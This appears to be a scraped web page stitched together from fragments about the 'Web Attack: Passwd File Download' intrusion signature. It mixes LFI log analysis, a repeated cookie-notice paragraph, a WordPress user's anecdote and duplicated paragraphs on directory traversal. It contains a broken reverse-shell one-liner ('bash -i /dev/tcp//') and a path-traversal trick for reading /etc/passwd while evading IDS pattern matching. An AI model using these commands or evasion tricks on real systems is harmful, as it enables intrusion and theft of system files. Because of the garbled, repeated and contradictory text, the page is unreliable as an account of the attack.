Web attack: passwd file download attempt

7 rows ·  · Event Description: [SID: ] Web Attack: Passwd File Download Estimated Reading Time: 1 min.  · In the following figure, we are searching for requests that try to read “/etc/passwd”, which is obviously a Local File Inclusion attempt. As shown in the above screenshot, we have many requests trying for LFI, and these are sent from the IP address These . When you visit any web site, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalised web.

The easiest way (with few special characters that could be blocked by WAF) is to use the bash -i command: bash -i /dev/tcp// 01, but unfortunately is too complicated to bypass all. Many web applications have file download sections where a user can download one or more files of his choice. If the input is not properly sanitized before being used to retrieve files from the file cabinet or retrieve attachments from a received message or memo, it can be exploited to download arbitrary files from the system via directory. /etc/passwd may be written as /etc/dummy/../passwd, and both versions are legal. This evasion technique can be used against application code that performs a file download to make it disclose an arbitrary file on the filesystem. Another use of the attack is to evade an IDS system looking for well-known patterns in the traffic.

Here is what I got when I visited my Wordpress website, bltadwin.ru It looks like very interesting and I am wondering what has been detected. Based on warning message and SID and I am able to find following details from Symantec (Broadcom) website: ===== Web Attack: Malicious Theme or Plugin Download 2 Severity:High This attack [ ]. When you visit any web site, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalised web. Many web applications have file download sections where a user can download one or more files of his choice. If the input is not properly sanitized before being used to retrieve files from the file cabinet or retrieve attachments from a received message or memo, it can be exploited to download arbitrary files from the system via directory.